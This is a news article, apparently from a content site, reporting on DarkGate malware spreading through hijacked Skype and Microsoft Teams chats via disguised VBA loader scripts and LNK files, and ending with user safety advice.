Title: Celebrity Beauty Buzz Faces DarkGate Malware Threat: Beware of Malicious Messages on Skype and Microsoft Teams
Subtitle: Cybersecurity experts warn of a surge in DarkGate malware spreading through popular messaging apps
DarkGate malware has recently become a growing concern for users of instant messaging platforms such as Skype and Microsoft Teams, according to cybersecurity experts. The malware is being spread through a cleverly disguised Visual Basic for Applications (VBA) loader script, masquerading as a harmless PDF document.
Once unwitting users open the disguised PDF, the VBA script immediately triggers the download and execution of an AutoIt script that launches the DarkGate malware. It is believed that the originating accounts on these messaging apps have been compromised through leaked credentials or previous compromises.
DarkGate is classified as a commodity malware, with capabilities to harvest sensitive data, conduct cryptocurrency mining, and even allow remote control of infected hosts. It has seen a significant rise in social engineering campaigns, utilizing tactics such as phishing emails and SEO poisoning to trick unsuspecting users into installing it.
Interestingly, DarkGate was previously advertised on underground forums, but it has now made its way into the mainstream as a malware-as-a-service offering, available for rent. This ease of access has contributed to a surge in its usage and distribution.
Truesec, a cybersecurity firm, has observed the use of Microsoft Teams chat messages as a propagation vector for DarkGate. The majority of attacks have been detected in the Americas, followed by Asia, the Middle East, and Africa.
The attack procedure employed by DarkGate through Skype and Teams bears resemblance to a malspam campaign reported in August 2023, with one key difference—the initial access route. The threat actors hijack existing messaging threads and craft filenames that relate to the chat history, successfully deceiving recipients into executing the VBA script.
In another attack sequence, cybercriminals send Microsoft Teams messages with ZIP archive attachments containing an LNK file. This file is designed to run a VBA script and retrieve the DarkGate artifact.
The payloads delivered by DarkGate can infect systems with various types of malware, including info stealers, ransomware, and cryptocurrency miners. Researchers express concern that as long as external messaging is allowed or misuse of trusted relationships goes unchecked, this technique can be utilized with any instant messaging app.
As the threat of DarkGate continues to grow, it is crucial for users to exercise caution while using Skype and Microsoft Teams. It is advised to refrain from opening suspicious attachments or clicking on unfamiliar links, especially if they are sent within existing messaging threads. Additionally, enabling two-factor authentication and regularly updating security software can provide an added layer of protection against such malware threats.
Stay informed and stay safe, as the battle against DarkGate and other emerging malware continues.
“Prone to fits of apathy. Devoted music geek. Troublemaker. Typical analyst. Alcohol practitioner. Food junkie. Passionate tv fan. Web expert.”